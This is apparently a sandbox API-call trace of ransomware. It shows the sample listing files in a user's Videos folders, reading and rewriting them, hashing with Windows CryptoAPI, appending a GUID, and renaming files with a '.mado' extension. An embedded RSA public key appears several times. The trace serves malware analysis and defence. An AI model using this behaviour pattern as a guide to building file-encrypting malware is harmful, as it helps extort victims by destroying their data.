[0206.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321958 [0206.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0206.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0206.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75d88 [0206.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.205] GetCurrentThreadId () returned 0x600 [0206.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0206.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0206.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75c80 [0206.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0206.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0206.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b18 [0206.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0206.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0206.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0206.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0206.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0206.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0206.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ad0 [0206.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0206.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.206] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa016, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.206] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0206.206] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.206] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.207] CloseHandle (hObject=0x63c) returned 1 [0206.211] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\ZWjQZfNN6ujr51vgjP5x.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\zwjqzfnn6ujr51vgjp5x.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\ZWjQZfNN6ujr51vgjP5x.avi.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\zwjqzfnn6ujr51vgjp5x.avi.mado")) returned 1 [0206.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.212] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a67c8 | out: hHeap=0x2c0000) returned 1 [0206.213] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccff23a0, ftCreationTime.dwHighDateTime=0x1d5dd51, ftLastAccessTime.dwLowDateTime=0x806e3500, ftLastAccessTime.dwHighDateTime=0x1d5e4d9, ftLastWriteTime.dwLowDateTime=0x806e3500, ftLastWriteTime.dwHighDateTime=0x1d5e4d9, nFileSizeHigh=0x0, nFileSizeLow=0xa016, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZWjQZfNN6ujr51vgjP5x.avi", cAlternateFileName="ZWJQZF~1.AVI")) returned 0 [0206.213] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed98 | out: hHeap=0x2c0000) returned 1 [0206.213] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.214] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\Rg76NG\\") returned="Rg76NG\\" [0206.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\") returned="ee2U4KlmK-3zpwEnEyLp\\" [0206.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0206.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.214] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.214] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.214] PathFindFileNameW (pszPath="") returned="" [0206.214] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\Rg76NG\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39a88220, ftCreationTime.dwHighDateTime=0x1d5d9cf, ftLastAccessTime.dwLowDateTime=0x71d2a010, ftLastAccessTime.dwHighDateTime=0x1d5df59, ftLastWriteTime.dwLowDateTime=0x71d2a010, ftLastWriteTime.dwHighDateTime=0x1d5df59, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.214] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39a88220, ftCreationTime.dwHighDateTime=0x1d5d9cf, ftLastAccessTime.dwLowDateTime=0x71d2a010, ftLastAccessTime.dwHighDateTime=0x1d5df59, ftLastWriteTime.dwLowDateTime=0x71d2a010, ftLastWriteTime.dwHighDateTime=0x1d5df59, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.214] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4957980, ftCreationTime.dwHighDateTime=0x1d5e009, ftLastAccessTime.dwLowDateTime=0xdc1ce1c0, ftLastAccessTime.dwHighDateTime=0x1d5e44e, ftLastWriteTime.dwLowDateTime=0xdc1ce1c0, ftLastWriteTime.dwHighDateTime=0x1d5e44e, nFileSizeHigh=0x0, nFileSizeLow=0x17766, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5XwhbW.swf", cAlternateFileName="")) returned 1 [0206.214] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\Rg76NG\\5XwhbW.swf") returned=".swf" [0206.215] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\Rg76NG\\5XwhbW.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ee2u4klmk-3zpweneylp\\rg76ng\\5xwhbw.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.215] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=96102) returned 1 [0206.215] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.217] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x17740, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.217] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.219] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x17766, lpOverlapped=0x0) returned 1 [0206.220] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.220] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.220] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.220] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0206.221] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.221] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.221] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.221] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.221] GetLastError () returned 0x0 [0206.221] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.221] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0206.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.221] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.221] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.221] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x17770) returned 0x3b81690 [0206.222] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0206.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0206.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66fa8 [0206.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79aa0 [0206.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66ff0 [0206.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ab8 [0206.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ae8 [0206.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b30 [0206.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b00 [0206.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0206.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0206.222] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0206.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ae8 | out: hHeap=0x2c0000) returned 1 [0206.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b00 | out: hHeap=0x2c0000) returned 1 [0206.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b30 | out: hHeap=0x2c0000) returned 1 [0206.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b30 [0206.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0206.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79b00 [0206.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0206.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79ae8 [0206.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72ec8 [0206.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0206.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72b80 [0206.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0206.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72ec8 | out: hHeap=0x2c0000) returned 1 [0206.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b00 | out: hHeap=0x2c0000) returned 1 [0206.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ae8 | out: hHeap=0x2c0000) returned 1 [0206.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b30 | out: hHeap=0x2c0000) returned 1 [0206.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0206.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.223] GetCurrentThreadId () returned 0x600 [0206.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x32ff7d8 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321958 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.224] GetCurrentThreadId () returned 0x600 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75d88 [0206.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75a70 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b30 [0206.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0206.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0206.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0206.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0206.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0206.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0206.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ae8 [0206.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0206.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0206.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0206.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0206.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b00 [0206.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0206.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0206.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ad0 [0206.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0206.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b48 [0206.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0206.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0206.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b18 [0206.226] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x17766, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 